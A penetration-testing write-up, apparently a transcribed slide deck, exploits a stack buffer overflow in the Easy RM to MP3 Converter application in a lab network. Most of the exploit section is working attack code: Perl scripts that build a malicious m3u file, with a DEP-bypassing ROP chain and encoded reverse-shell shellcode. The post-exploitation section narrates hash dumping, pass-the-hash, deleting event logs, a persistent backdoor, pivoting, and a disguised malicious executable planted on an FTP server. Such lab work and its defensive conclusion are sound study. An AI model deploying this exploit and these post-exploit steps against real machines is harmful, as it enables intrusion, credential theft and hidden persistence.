Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
1. Penetration Testing for Easy RM to MP3
Converter Application & Post Exploit
Author:
JongWon Kim
dikien2012@gmail.com
http://dikien2012.blogspot.com
1
2. Table of Contents
Penetration Testing for Easy RM to MP3 Converter Application.............................................................1
Table of Contents……….........................................................................................................................2
Abstract..................................................................................................................................................3
Setting up the Testing Enviroment.........................................................................................................4
Strategy for the Application Testing........................................................................................................5
Dynamic Analysis...................................................................................................................................6
Strategy for the Post Exploit.................................................................................................................15
Post Exploit...........................................................................................................................................16
Conclusion............................................................................................................................................21
http://dikien2012.blogspot.com
2
3. Abstract
Advanced Persistent Attack nowadays has threatened our valuable assets. Many exploits that
threaten end point users and corporation have been researched day by day. No matter how operation
system protection methods works well, privilege escalation could be easy just because a vulnerable
application. Many corporations defends their information by setting firewall, WAF, and SLB, but only
one vulnerable application could make these powerful protection line incapacitated. In this paper, I will
analysis this application and suggest the solution within windows environment.
This is imaginary scenario for this paper. My client requests me sometimes „Easy RM to MP3
Converter ‟exits when opening a m3u file that contains an overly long strings. First, I figure out this
application has a vulnerability with stack based buffer overflow. I build the ROP based exploit to test.
Second, I will attack the machine running the application with the exploitation and do post exploit.
http://dikien2012.blogspot.com
3
4. Setting up the Testing Environment
Backtrack5 R1(Attack Machine, 192.168.10.10)
Windows SP2 (First Victim for the application penetration testing, 192.168.10.5, 10.10.10.5)
Windows SP3(Second Victim for pivot, 10.10.10.20)
Immunity Debugger 1.83
Easy RM to MP3 Converter(2.7.3.700, Vulnerable Application)
Metasploit Framework
Social Engineering Toolkit
ALFTP 5.22
Testing Environment Explanation :
The default DEP, Data Execute Protection, setting for Windows SP2 is OptIn(All programs, process,
services on the windows system are protected, except for processes in the exception list). Before
taking a penetration testing, I manually have changed it to OptOut by adding „/noexecute=policy‟ to
the end of the line that refers to the OS boot configuration. OptOut option is that all programs,
processes, services on the Windows system are protected, except for processes in the exception list.
There is no the exception list for this testing.
http://dikien2012.blogspot.com
4
5. Strategy for the Application Testing
I use one of the windows function calls named VirtualProtect() to bypass DEP. This function change
the access protection level of a given memory page, allowing to make the location where my payload
resides executable. I have to set up the stack with the correct parameters for that function first. I can‟t
overwrite return address directly to my payload or use SEH chains because the payload will not get
executed on stack since DEP is OptOut.
Below is the prototype of VirtualProtect() :
BOOL WINAPI VirtualProtect(
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
Return address: VirtualProtect () will return to the pointer to the location where the address of
the payload on the stack
lpAddress: A pointer an address that describes the starting page of the region of pages
whose access protection attributes are to be changed.
dwSize: The size of the region whose access protection attributes are to be changed, in
bytes.
flNewProtect: Option that specifies the new protection
0x00000040 PAGE_EXECUTE_READWRITE
lpflOldProtect : Pointer to variable that will receive the previous access protection value.
http://dikien2012.blogspot.com
5
6. Dynamic Analysis
At first, I calculate the offset between registers and the buffer with the perl script to make a vulnerable
m3u file and run the application attached debugger with the m3u file. Below is source code to make
an m3u file.
==================================================================
my $file= "exploit.m3u";
my $junk= "x41" x 26058;
$junk = $junk . "XXXX";
my $eip = "BBBB"; # This will overwrite the EIP.
my $nops = "x90"x240;
my $shellcode =””;
my $rest = "C"x300;
my $payload = $junk.$eip.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."n";
print "Shellcod size : ".length($shellcde)."n";
open($FILE,">$file");
print $FILE "$payload";
close($FILE);
print "m3u File Created successfullyn";
==================================================================
[ Figure 1. EIP is overwritten with BBBB ]
http://dikien2012.blogspot.com
6
7. 42424242 is hexadecimal representation for BBBB. There is another method to find offset with
mona.py by command line below debugger „!mona pattern_create 3000‟. I add this unique pattern to
the script.
==================================================================
my $file= "exploit.m3u";
my $junk= "x41" x 26000;
my $pattern =””; # msf unique pattern is here
my $nops = "x90"x240;
my $shellcode = "";
my $rest = "C"x300;
my $payload = $junk.$pattern.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."n";
print "Shellcod size : ".length($shellcde)."n";
open($FILE,">$file");
print $FILE "$payload";
close($FILE);
print "m3u File Created successfullyn";
==================================================================
After crashing, I get more useful information by command „!mona suggest‟. On top of that, I check if
the payload is corrupt or not by command „!mona compare -f “C:Documents and
SettingsAdministrator바탕 화면RM2MP3Converterpattern.txt‟. I create gatgets to make a ROP
chains by command „!mona rop -n -cm aslr=false,safeseh=false,rebase=false‟. After making the ROP
chains, EIP will point the shellcode that I want to get executed. I made the shellcode with msfpayload
and msfencode and added the script to make a final exploit m3u file.
[ Figure 2. Making a Payload to connect back to attacker machine ]
My final exploit is below.
Stage-1 : Saving stack pointer to EAX and EDI registers and jumping over the parameters
Stage-2 : Crafting parameters lead to setting up the arguments of a function that would allow me to
disable DEP or bypass it.
http://dikien2012.blogspot.com
7
8. ==================================================================
my $file= "exploit.m3u";
my $junk= "x41" x 26064;
my $eip = pack('V',0x7C84483D); # RETN from kernel32.dll
my $junk2 = "AAAA"; # Compensate for
########### Stage-1 Started here ###########
########### Put stack pointer in EDI & EAX ###########
my $rop = pack('V',0x5a489ee7); # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll
$rop = $rop.pack('V',0x77bce842); # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll
$rop = $rop."AAAA"; # Compensate for
$rop = $rop.pack('V',0x1001653D); # ADD ESP,20//RETN from MSRMfilter03.dll
########### Parameters fpr VirtualProtect() ###########
my $parameters =pack('V',0x7C801AD0); # Address for VirtualProtect ()
$parameters = $parameters."WWWW"; # Return address
$parameters = $parameters."XXXX"; # lpaddress
$parameters = $parameters."YYYY"; # Size
$parameters = $parameters."ZZZZ"; # flNewProtect
$parameters = $parameters.pack('V',0x10035005); # Writeable address
$parameters = $parameters.("H" x 8); # Padding
########### Stage-1 finished ###########
########### Stage-2 starts is below ###########
########### First Parameter ############
my $rop2 = pack('V',0x77427175); # XCHG EDI,ESI//RETN 8
http://dikien2012.blogspot.com
8
9. ########### Make EAX point at the shellcode ###########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP from MSRMfilter03.dll
$rop2 = $rop2."AAAA"; # Padding - Compensate for RETN 8
$rop2 = $rop2."AAAA";
$rop2 = $rop2."AAAA";
########### Second Parameter, RETN is in EAX ############
$rop2 = $rop2.pack('V',0x77D944C4);
# MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA"; #Padding
########## EAX now contains Stack Pointer #############
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## Make EAX point at Shellcode again ###########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; #Padding
########## Increase ESI with 4 #############
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
########## Write lpADDress ############
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI
$rop2 = $rop2."AAAA"; # Padding
http://dikien2012.blogspot.com
9
10. ########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX POP ESI RETN
########## Create Size Set EAX to 300 or so ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x1002DC4C); #ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA"; # Padding
########## Write Size, First Set ESI to Right Place ##########
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
$rop2 = $rop2.pack('V',0x5C83F948);
########## 3th Parameter ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI
$rop2 = $rop2."AAAA"; # Padding
########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## flNewProject 0x40 ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN
http://dikien2012.blogspot.com
10
11. $rop2 = $rop2."AAAA"; # Padding
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
$rop2 = $rop2.pack('V',0x5C83F948); # INC ESI//RETN from comctl32
########## 4th Parameter ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//RETN
$rop2 = $rop2."AAAA"; # Padding
########## Return to virtual protect pointer, Compensate for 2 POPs instruction ##########
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//ret
########## Change ESP & Back to the origin ##########
$rop2 = $rop2.pack('V',0x73D35CA8);
# PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll
my $nops = "x90"x240;
$shellcode = "x89xe0xd9xf6xd9x70xf4x5ax4ax4ax4ax4ax4ax4a" .
"x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x49x6cx49x78x6bx39x43x30x75x50x53" .
"x30x73x50x4ex69x4dx35x44x71x6ex32x62x44x6c" .
"x4bx62x72x30x30x4cx4bx46x32x56x6cx6ex6bx30" .
"x52x75x44x6ex6bx61x62x56x48x74x4fx4dx67x42" .
"x6ax65x76x30x31x49x6fx66x51x79x50x6cx6cx75" .
http://dikien2012.blogspot.com
11
13. "x70x61x7ax34x44x50x56x36x37x75x38x63x32x4b" .
"x69x69x58x73x6fx49x6fx39x45x4ex6bx57x46x31" .
"x7ax47x30x33x58x55x50x44x50x47x70x73x30x32" .
"x76x62x4ax65x50x32x48x66x38x69x34x61x43x59" .
"x75x69x6fx68x55x5ax33x56x33x61x7ax55x50x61" .
"x46x32x73x50x57x30x68x66x62x68x59x48x48x53" .
"x6fx6bx4fx39x45x47x71x48x43x57x59x58x46x4e" .
"x65x4cx36x30x75x68x6cx6fx33x41x41";
my $rest = "C"x300;
my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."n";
print "Shellcod size : ".length($shellcde)."n";
open($FILE,">$file");
print $FILE "$payload";
close($FILE);
print "m3u File Created successfullyn";
==================================================================
Since the shellcode is turning back to the backtrack machine, I use multi handler on msfconosole to
listen on 4444 tcp port.
[ Figure 3. Listening on 4444 tcp port ]
http://dikien2012.blogspot.com
13
14. I create the m3u file with above script and open it with the application.
[ Figure 4. Open the exploit.m3u to crach the application ]
I get the meterpreter shell from first victim machine..
[ Figure 5. Get the Meterpreter shell from the first Victim Machine ]
http://dikien2012.blogspot.com
14
15. Strategy for the Post Exploit
1. Understanding the Victim better
2. Privilege Escalation
3. Deleting Logs and Killing Monitoring software
4. Collecting Data, and Executing programs
5. Backdoors and Rootkits
6. Using victims as a Pivot to hack deeper into the network
http://dikien2012.blogspot.com
15
16. Post Exploit
1. Understaning the Victim better
[ Figure 5. Network Information ]
I figure out password hashes and can crack it with JohnTheRipper. If I cannot figure out what the
original passwords, I can use the pass-the-hash technique, which requires that we have only the
password hash, not the password itself.
[ Figure 6. Password Hashes ]
I can look for more vulnerable applications, available tokens, and routing table.
[ Figure 7. Token Lists ]
http://dikien2012.blogspot.com
16
17. [ Figure 8. Running applications ]
[ Figure 9. Routing Table ]
I notice this machine is running on ALFTP, it will be used on social engineering attack.
[ Figure 10. ALFTP is running ]
2. Privilege Escalation
After getting the system, I safely migrate 1072(svchost.exe) via technique 1.
[ Figure 11. Privilege Escalation Success ]
http://dikien2012.blogspot.com
17
18. 3. Deleting Logs and Killing Monitoring software
I try to kill anti virus software, but there is no it and get rid of event logs.
[ Figure 12. Killing AV and deleting event logs ]
4. Collecting Data, and Executing programs
[ Figure 13. Collecting txt files ]
5. Backdoors and Rootkits
I run persistence and tell Windows to auto start the agent at boot time, wait 100 seconds before
connection retries to run on port 443 and connect to IP 192.168.10.5.
[ Figure 14. Installing the Backdoor ]
http://dikien2012.blogspot.com
18
19. 6. Using victims as a Pivot to hack deeper into the network
I found the first victim machine has two network cards of different subnets, which will be inner network
disconnected from outside. I go inside using first victim machine working tunnel.
[ Figure 15. Setting routing table ]
[ Figure 16. Running scan via session 1 ]
I am aware the second victim machine (10.10.10.20) has open port for 139, which means it could
have vulnerability for „MS08-067‟.
[ Figure 17. Port Scan ]
I make a malicious file with fake name (alsong.exe) that works for connecting back to attacker
machine with meterpreter shell. I find the working directory for FTP Server on first victim machine and
upload it.
[ Figure 18. Uploading the malicious file ]
http://dikien2012.blogspot.com
19
20. Check it out malicious file is on the FTP Server. Second victim download and execute it.
[ Figure 19. Uploading the malicious file ]
New session is created by second victim machine.
[ Figure 20. Attak Success on second Victim machine ]
http://dikien2012.blogspot.com
20
21. Conclusion
I showed vulnerable application could threaten the inner intranet. It is not always latest OS protection
mechanism, Firewall, and SLB can protect our assets. It is vital that not only developers should
ensure their secure coding from preventing from such as buffer over flow or heap spray attack, but
also end point users should be aware security consciousness whose they don‟t have to use
applications they don‟t use for work and always updated to the latest condition. It is obvious that
essential database should be away from normal staffs completely. As is frequently pointed out, we
should keep in mind attack could happen inside.
http://dikien2012.blogspot.com
21